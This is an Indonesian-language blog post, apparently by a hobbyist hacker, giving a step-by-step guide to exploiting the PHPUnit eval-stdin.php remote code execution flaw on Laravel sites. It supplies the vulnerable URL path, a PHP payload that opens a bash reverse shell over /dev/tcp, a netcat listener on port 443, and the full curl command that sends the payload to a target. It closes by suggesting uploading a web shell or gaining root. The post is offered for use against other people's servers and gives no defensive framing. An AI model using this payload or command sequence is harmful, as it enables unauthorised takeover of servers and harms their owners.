Laravel PHPUnit RCE (Backconnect)

Hii sobat pixel udah lama nggak update artikel hehe, pada kesempatan kali ini disini saya mau membagikan gimana sih caranya melakukan Backconnect tapi pada bug yang lagi hitz " PHPUnit Rce", Oke, gausah banyak cingcong langsung aja di follow :3

Oh iya buat targetnya kalian bisa pake exploit di bawah ini nih:

Full Path Exploit : http://target/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Oke disini saya sendiri sudah mempunyai target saya, kita masuk aja langsung ke terminal kita ... ets jangan lupa pakai prameter -d untuk mengirim data ya

<?php system('bash -i >& /dev/tcp/ip/port 0>&1');?>

Nah pertama-tama kita lakukan Reverse shell menggunakan netcat, kita gunakan port 443 saja ya...

Setelah itu buka terminal baru dan masukan target dengan commands:

curl -d "<?php system('bash -i >& /dev/tcp/ip/port 0>&1');?>" http://target/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

NB: ip ( ipmu ) - port ( 443 )

Jika sudah kamu enter saja, dan lihat tab terminal yang tadi kamu lakukan reverse shell..

Taraaaaaaaaaaa berhasil kaan, ya setelah itu sih, tergantung kamu mau upload shell ataupun mau root jika memang kernelnya mendukung ea..

Sekian saja trimakasih :*